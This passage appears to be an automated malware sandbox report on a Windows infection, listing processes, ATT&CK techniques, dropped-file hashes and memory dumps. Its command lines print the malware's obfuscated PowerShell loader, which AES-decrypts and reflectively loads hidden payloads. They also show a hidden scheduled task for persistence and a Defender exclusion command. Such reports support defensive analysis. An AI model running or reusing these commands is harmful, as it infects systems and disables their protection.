'$VyBmptOMNBIcWYPebJsgSRdMOvuMeIdNHOLgKxPDXxeUXQJIiwYGxUPevOxUZcHfyUuinIuDUOjvMiPYLLDHKwpNYHLVaVEVPZwcvAvzcuMILurmYzioyaubEGjGXyDZknFNLNCkqeEqJHcDpzXBMq=$MjSwFSGHYBZqPaI.OBFOBFUSCUDAEOBFOBFUSCUDAnOBFOBFUSCUDAtOBFOBFUSCUDArOBFOBFUSCUDAyOBFOBFUSCUDAPOBFOBFUSCUDAoOBFOBFUSCUDAiOBFOBFUSCUDAnOBFOBFUSCUDAtOBFOBFUSCUDA;'.Replace('OBFOBFUSCUDA', ''); IEX '$VyBmptOMNBIcWYPebJsgSRdMOvuMeIdNHOLgKxPDXxeUXQJIiwYGxUPevOxUZcHfyUuinIuDUOjvMiPYLLDHKwpNYHLVaVEVPZwcvAvzcuMILurmYzioyaubEGjGXyDZknFNLNCkqeEqJHcDpzXBMq.OBFOBFUSCUDAIOBFOBFUSCUDAnOBFOBFUSCUDAvOBFOBFUSCUDAoOBFOBFUSCUDAkOBFOBFUSCUDAeOBFOBFUSCUDA($null, $param2_var);'.Replace('OBFOBFUSCUDA', '');}$Le = 'C:\Users\Admin\AppData\Local\Temp\c.bat';$host.UI.RawUI.WindowTitle = $Le;$gUKFXTSqvy=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($Le).Split([Environment]::NewLine);foreach ($wU in $gUKFXTSqvy) { if ($wU.StartsWith(':: ')) { $s=$wU.Substring(3); break; }}$payloads_var=[string[]]$s.Split('\');IEX '$payload1_var=decompress_function (decrypt_function ([OBFOBFUSCUDACOBFOBFUSCUDAoOBFOBFUSCUDAnOBFOBFUSCUDAvOBFOBFUSCUDAeOBFOBFUSCUDArt]::OBFOBFUSCUDAFOBFOBFUSCUDArOBFOBFUSCUDAoOBFOBFUSCUDAmOBFOBFUSCUDABOBFOBFUSCUDAaOBFOBFUSCUDAse6OBFOBFUSCUDA4OBFOBFUSCUDASOBFOBFUSCUDAtOBFOBFUSCUDAriOBFOBFUSCUDAnOBFOBFUSCUDAgOBFOBFUSCUDA($payloads_var[0])));'.Replace('OBFOBFUSCUDA', '');IEX '$payload2_var=decompress_function (decrypt_function ([OBFOBFUSCUDACOBFOBFUSCUDAoOBFOBFUSCUDAnOBFOBFUSCUDAvOBFOBFUSCUDAeOBFOBFUSCUDArOBFOBFUSCUDAt]::OBFOBFUSCUDAFOBFOBFUSCUDArOBFOBFUSCUDAoOBFOBFUSCUDAmOBFOBFUSCUDABOBFOBFUSCUDAaOBFOBFUSCUDAsOBFOBFUSCUDAeOBFOBFUSCUDA6OBFOBFUSCUDA4OBFOBFUSCUDASOBFOBFUSCUDAtrOBFOBFUSCUDAiOBFOBFUSCUDAnOBFOBFUSCUDAg($payloads_var[1])));'.Replace('OBFOBFUSCUDA', '');execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('OBFOBFUSCUDA'));
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - System Location Discovery: System Language Discovery
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1700
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'svchoststr977_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\inicia_str_977.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1196
  - - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\inicia_str_977.vbs"
      4⤵
      Checks computer location settings
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:4784
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\inicia_str_977.bat" "
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:4060
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ IEX '#EspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNK '.Replace('Espaco', ''); $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Rr8+grcZJNGH203eeUxXpnDWX4hdpd2UTJfbowjN1dY='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('/21C5PLzK2uu1MqJwEaXWg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ IEX '$bbKFI=New-Object System.IO.MOBFOBFUSCUDAemOBFOBFUSCUDAorOBFOBFUSCUDAySOBFOBFUSCUDAtrOBFOBFUSCUDAeaOBFOBFUSCUDAm(,$param_var);'.Replace('OBFOBFUSCUDA', ''); IEX '$tDIwH=New-Object System.IO.OBFOBFUSCUDAMOBFOBFUSCUDAeOBFOBFUSCUDAmOBFOBFUSCUDAoOBFOBFUSCUDArOBFOBFUSCUDAyOBFOBFUSCUDASOBFOBFUSCUDAtOBFOBFUSCUDArOBFOBFUSCUDAeOBFOBFUSCUDAaOBFOBFUSCUDAmOBFOBFUSCUDA;'.Replace('OBFOBFUSCUDA', ''); IEX '$FlJeX=New-Object System.IO.COBFOBFUSCUDAomOBFOBFUSCUDAprOBFOBFUSCUDAeOBFOBFUSCUDAssOBFOBFUSCUDAioOBFOBFUSCUDAn.OBFOBFUSCUDAGZOBFOBFUSCUDAipOBFOBFUSCUDAStOBFOBFUSCUDAreOBFOBFUSCUDAamOBFOBFUSCUDA($bbKFI, [IO.COBFOBFUSCUDAomOBFOBFUSCUDAprOBFOBFUSCUDAesOBFOBFUSCUDAsiOBFOBFUSCUDAonOBFOBFUSCUDA.CoOBFOBFUSCUDAmpOBFOBFUSCUDAreOBFOBFUSCUDAssOBFOBFUSCUDAiOBFOBFUSCUDAoOBFOBFUSCUDAnOBFOBFUSCUDAMode]::DOBFOBFUSCUDAeOBFOBFUSCUDAcOBFOBFUSCUDAompOBFOBFUSCUDAreOBFOBFUSCUDAss);'.Replace('OBFOBFUSCUDA', ''); $FlJeX.CopyTo($tDIwH); $FlJeX.Dispose(); $bbKFI.Dispose(); $tDIwH.Dispose(); $tDIwH.ToArray();}function execute_function($param_var,$param2_var){ IEX '$MjSwFSGHYBZqPaI=[System.ROBFOBFUSCUDAeOBFOBFUSCUDAflOBFOBFUSCUDAectOBFOBFUSCUDAioOBFOBFUSCUDAn.OBFOBFUSCUDAAsOBFOBFUSCUDAseOBFOBFUSCUDAmbOBFOBFUSCUDAlOBFOBFUSCUDAyOBFOBFUSCUDA]::LOBFOBFUSCUDAoOBFOBFUSCUDAaOBFOBFUSCUDAdOBFOBFUSCUDA([byte[]]$param_var);'.Replace('OBFOBFUSCUDA', ''); IEX '$VyBmptOMNBIcWYPebJsgSRdMOvuMeIdNHOLgKxPDXxeUXQJIiwYGxUPevOxUZcHfyUuinIuDUOjvMiPYLLDHKwpNYHLVaVEVPZwcvAvzcuMILurmYzioyaubEGjGXyDZknFNLNCkqeEqJHcDpzXBMq=$MjSwFSGHYBZqPaI.OBFOBFUSCUDAEOBFOBFUSCUDAnOBFOBFUSCUDAtOBFOBFUSCUDArOBFOBFUSCUDAyOBFOBFUSCUDAPOBFOBFUSCUDAoOBFOBFUSCUDAiOBFOBFUSCUDAnOBFOBFUSCUDAtOBFOBFUSCUDA;'.Replace('OBFOBFUSCUDA', ''); IEX '$VyBmptOMNBIcWYPebJsgSRdMOvuMeIdNHOLgKxPDXxeUXQJIiwYGxUPevOxUZcHfyUuinIuDUOjvMiPYLLDHKwpNYHLVaVEVPZwcvAvzcuMILurmYzioyaubEGjGXyDZknFNLNCkqeEqJHcDpzXBMq.OBFOBFUSCUDAIOBFOBFUSCUDAnOBFOBFUSCUDAvOBFOBFUSCUDAoOBFOBFUSCUDAkOBFOBFUSCUDAeOBFOBFUSCUDA($null, $param2_var);'.Replace('OBFOBFUSCUDA', '');}$Le = 'C:\Users\Admin\AppData\Roaming\inicia_str_977.bat';$host.UI.RawUI.WindowTitle = $Le;$gUKFXTSqvy=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($Le).Split([Environment]::NewLine);foreach ($wU in $gUKFXTSqvy) { if ($wU.StartsWith(':: ')) { $s=$wU.Substring(3); break; }}$payloads_var=[string[]]$s.Split('\');IEX '$payload1_var=decompress_function (decrypt_function ([OBFOBFUSCUDACOBFOBFUSCUDAoOBFOBFUSCUDAnOBFOBFUSCUDAvOBFOBFUSCUDAeOBFOBFUSCUDArt]::OBFOBFUSCUDAFOBFOBFUSCUDArOBFOBFUSCUDAoOBFOBFUSCUDAmOBFOBFUSCUDABOBFOBFUSCUDAaOBFOBFUSCUDAse6OBFOBFUSCUDA4OBFOBFUSCUDASOBFOBFUSCUDAtOBFOBFUSCUDAriOBFOBFUSCUDAnOBFOBFUSCUDAgOBFOBFUSCUDA($payloads_var[0])));'.Replace('OBFOBFUSCUDA', '');IEX '$payload2_var=decompress_function (decrypt_function ([OBFOBFUSCUDACOBFOBFUSCUDAoOBFOBFUSCUDAnOBFOBFUSCUDAvOBFOBFUSCUDAeOBFOBFUSCUDArOBFOBFUSCUDAt]::OBFOBFUSCUDAFOBFOBFUSCUDArOBFOBFUSCUDAoOBFOBFUSCUDAmOBFOBFUSCUDABOBFOBFUSCUDAaOBFOBFUSCUDAsOBFOBFUSCUDAeOBFOBFUSCUDA6OBFOBFUSCUDA4OBFOBFUSCUDASOBFOBFUSCUDAtrOBFOBFUSCUDAiOBFOBFUSCUDAnOBFOBFUSCUDAg($payloads_var[1])));'.Replace('OBFOBFUSCUDA', '');execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('OBFOBFUSCUDA'));
        6⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:2956

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden -c .('Add-MpP' + 'reference') -ExclusionPath C:\ -ExclusionProcess powershell.exe
1⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2668

C:\Windows\system32\taskkill.exe
taskkill /IM cmstp.exe /F
1⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3192

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
9751fcb3d8dc82d33d50eebe53abe314

SHA1
7a680212700a5d9f3ca67c81e0e243834387c20c

SHA256
ad2e3139aa438f799c4a876ca3e64af772b8a5786149925a08389723e42394d7

SHA512
54907cc18684ff892b737496183ca60c788d8f5d76365586954f269dbd50ac1b9cd48c7c50bd6ca02009e6020fd77a8282c9a7ad6b824a20585c505bd7e13709

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
17KB

MD5
210ee72bc437952f9dcaa1e0b9523d66

SHA1
9dcc136e0daf7bb4571747c80b13f9685b8b2b29

SHA256
d68ef1e2076886167bde8a18890c6e7ab03fe9ced125cc066fef81838c7bc3cf

SHA512
d96dfa464cc05099e7ad7c0b95ca8b83e7bc0707dca2f8022f3d4875e5fe22d7bd834a511e6e6a44700d0ca40b9543b942bee01381a25cfbf2b0d5b434fbcdaa

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
933B

MD5
ee7d7f7bce4c137a69aefb70db9ba11c

SHA1
c09d95237bf4a400e98e13871b035d63ef4aa326

SHA256
596c5eab120e99758db2ab070ecd62d53d1bee6c38b07b0058a54c4d5c7870b5

SHA512
6c21cc509c2ffdf2dabde207d27f0a7cda52849594477692dd19eac44c94acbcdfee42501a54e435c7922228bfd105c985c463acfd105942874c981ec198ff4d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
4a94b4432dca934df6651a53f56abe6b

SHA1
1461c5bc22eaef55ed98713d67a4c5f5c8e11d69

SHA256
63455ddf3d736ca85a5a6805851142c18f28b9987d5f6caa9dd490269b34f8a2

SHA512
8f262e5b722138e3b1576e89528a46c031a0239939d45916e0a688ca802c6de3d3ddf19391a6b5660ac7fb9dc9da25eb9c2ad8fd77ed798175a09e2095cb94b6

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES8647.tmp

Filesize
1KB

MD5
572233ea32ebbe6be600e992aab96c89

SHA1
4ae22479115aefb3a04ad7606be7a24445fa1239

SHA256
de68d088b45d5c44312a857015f79fbe42ab3f9dda83d10e77ac240a59de9f47

SHA512
09bb7ffabfb8bc1abe0105d06173c8a53450654410689193f6b744adafcac131b714b042a3efd3adec876f88f2837f11a49a8566aaf842c4e2cdf123f12374ec

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1cktvjhm.3kh.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\aqy2xwz4\aqy2xwz4.dll

Filesize
4KB

MD5
0b831048970c8177003e125ec4faff79

SHA1
9aa5c32363ba77923d26e9c3df3c0d1c28650a9f

SHA256
bb99188a87a5719db27c4a715c0a63253ada885d8e2793ef4effa01c1ad3a0d3

SHA512
03f99d8b17e94449e050d9ac73cc5b3e06f128f266683e334203045a2a533326e5c527e80456b2cb3d7860c6afc0718a40cbabfc3f9cad6f3428b9e95f92bd29

Download Submit
C:\Users\Admin\AppData\Local\Temp\c.bat

Filesize
74KB

MD5
5232ae6fddae8282c999a2af864b6740

SHA1
32036e875da948a42c6ee56f3efa6fd3eff57072

SHA256
a385fb3a490d7d72e6ab967898ce90f68262816655a6978d398cb51cfbed0c4e

SHA512
09a0c7c1bf434cefd3159d11842d570ec862cda5559bd7db3b2839809397189744b4a1a6927392b42fa6842463c477d4fe9c616d9e6549d5eafe9fbc19838130

Download Submit
C:\Users\Admin\AppData\Roaming\inicia_str_977.vbs

Filesize
114B

MD5
0971fa34dc9068d693e863378e7a8478

SHA1
83c53553ae7ff14d123223ef04f73b3b1f23afeb

SHA256
12a9f0be88450c8365b91870c7871e2700e1a911aafc9b9d3ebba10b56398844

SHA512
294bfe2aee5c81ea37f5c0e3f1430b815d561674ce98ec3b2d6b4bd8beffbb385492b8e9b1bc710cf26b8c258247204533504d85b43f521c9783678a996c86fb

Download Submit
C:\windows\temp\nnua52se.inf

Filesize
663B

MD5
27581dbbe3c3840ce72f99c21071898a

SHA1
898afeb9523df9367c74a01c0dbecf6b637f3cb1

SHA256
c5f2bbdebccd52c3eba3c97a251ffa2ccd01f64de764e560f804045fe868d27b

SHA512
0b9c4531e8be5b292638cb2cad7fd1b72ed3f1aa20ea027b9a013a8bfb2daaa4a25a40c37423e0924d110bbbbfad4a6e21aa03f4694978d205d7ac9739567d9f

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\aqy2xwz4\CSC3EF4BD40A98448F4AEC7FE3D5CCC8648.TMP

Filesize
652B

MD5
23588fbd08b643f6697ac93e01733aa8

SHA1
aa6fc78d363cd8de2101bf5bfd593cd2072fabee

SHA256
5a9aa54a8480d1e18566217d935805c1f640b8b82d90e419384b97faec91eb1b

SHA512
0eb96ec9aaf04aa891c1198c5b4e6a8e0323395412b3c9659932d55156d70f0355b853741208d956c2ff4ca67eeb44b1db30bf43a404c92e6e5dd45eb38ac9d6

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\aqy2xwz4\aqy2xwz4.0.cs

Filesize
2KB

MD5
b8106096972fb511e0cf8b99386ecf93

SHA1
3003ba3a3681ba16d124d5b2305e6cc59af79b44

SHA256
49d2a0f78cbec3d87396b6f52f791c66505edeec87a70d4ce45721288210da02

SHA512
218bd9cd17c56d2e138205a197780cc2a5a81bfce7d5439eecb168f61955ba97793e7333425c064f6b6337e1f70c75bd373a7fb502a8c538fb046600018f871e

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\aqy2xwz4\aqy2xwz4.cmdline

Filesize
369B

MD5
8b93d97242c37e26a4db8120320cd7e1

SHA1
5b7025c70386bfc42b8920546b78b1e4379a8ccb

SHA256
75f9c0f8c05846e6c836b8910d742e302c19c7b011626220f6831792e4323b0d

SHA512
1dc05be53e0d303ccbd1b4351ff837df99d3d39d9815585cb7e4c7ec31f048e4566961102d52230ce524a5d1f6890e5bef4215b3221edb4c7517a78f958a1e02

Download Submit
memory/1196-86-0x00000000073D0000-0x0000000007402000-memory.dmp

Filesize
200KB

Download
memory/1196-87-0x0000000070680000-0x00000000706CC000-memory.dmp

Filesize
304KB

Download
memory/1196-101-0x0000000007760000-0x0000000007771000-memory.dmp

Filesize
68KB

Download
memory/1196-100-0x00000000077E0000-0x0000000007876000-memory.dmp

Filesize
600KB

Download
memory/1196-99-0x00000000075D0000-0x00000000075DA000-memory.dmp

Filesize
40KB

Download
memory/1196-98-0x0000000007410000-0x00000000074B3000-memory.dmp

Filesize
652KB

Download
memory/1196-97-0x00000000073B0000-0x00000000073CE000-memory.dmp

Filesize
120KB

Download
memory/1700-56-0x0000000005650000-0x00000000056B6000-memory.dmp

Filesize
408KB

Download
memory/1700-75-0x0000000007D40000-0x00000000082E4000-memory.dmp

Filesize
5.6MB

Download
memory/1700-57-0x00000000056C0000-0x0000000005726000-memory.dmp

Filesize
408KB

Download
memory/1700-67-0x00000000057F0000-0x0000000005B44000-memory.dmp

Filesize
3.3MB

Download
memory/1700-53-0x00000000049B0000-0x00000000049E6000-memory.dmp

Filesize
216KB

Download
memory/1700-69-0x0000000005D10000-0x0000000005D2E000-memory.dmp

Filesize
120KB

Download
memory/1700-70-0x0000000005DC0000-0x0000000005E0C000-memory.dmp

Filesize
304KB

Download
memory/1700-71-0x00000000076C0000-0x0000000007D3A000-memory.dmp

Filesize
6.5MB

Download
memory/1700-72-0x00000000062B0000-0x00000000062CA000-memory.dmp

Filesize
104KB

Download
memory/1700-73-0x0000000006ED0000-0x0000000006ED8000-memory.dmp

Filesize
32KB

Download
memory/1700-74-0x0000000006EE0000-0x0000000006EEE000-memory.dmp

Filesize
56KB

Download
memory/1700-54-0x0000000005020000-0x0000000005648000-memory.dmp

Filesize
6.2MB

Download
memory/1700-55-0x0000000004F40000-0x0000000004F62000-memory.dmp

Filesize
136KB

Download
memory/2144-0-0x00007FFCD54B3000-0x00007FFCD54B5000-memory.dmp

Filesize
8KB

Download
memory/2144-44-0x00007FFCD54B0000-0x00007FFCD5F71000-memory.dmp

Filesize
10.8MB

Download
memory/2144-13-0x0000024B692C0000-0x0000024B692DC000-memory.dmp

Filesize
112KB

Download
memory/2144-26-0x0000024B69320000-0x0000024B69328000-memory.dmp

Filesize
32KB

Download
memory/2144-48-0x00007FFCD54B0000-0x00007FFCD5F71000-memory.dmp

Filesize
10.8MB

Download
memory/2144-43-0x00007FFCD54B3000-0x00007FFCD54B5000-memory.dmp

Filesize
8KB

Download
memory/2144-12-0x00007FFCD54B0000-0x00007FFCD5F71000-memory.dmp

Filesize
10.8MB

Download
memory/2144-11-0x00007FFCD54B0000-0x00007FFCD5F71000-memory.dmp

Filesize
10.8MB

Download
memory/2144-6-0x0000024B50E00000-0x0000024B50E22000-memory.dmp

Filesize
136KB

Download
memory/2956-122-0x00000000062E0000-0x00000000062F2000-memory.dmp

Filesize
72KB

Download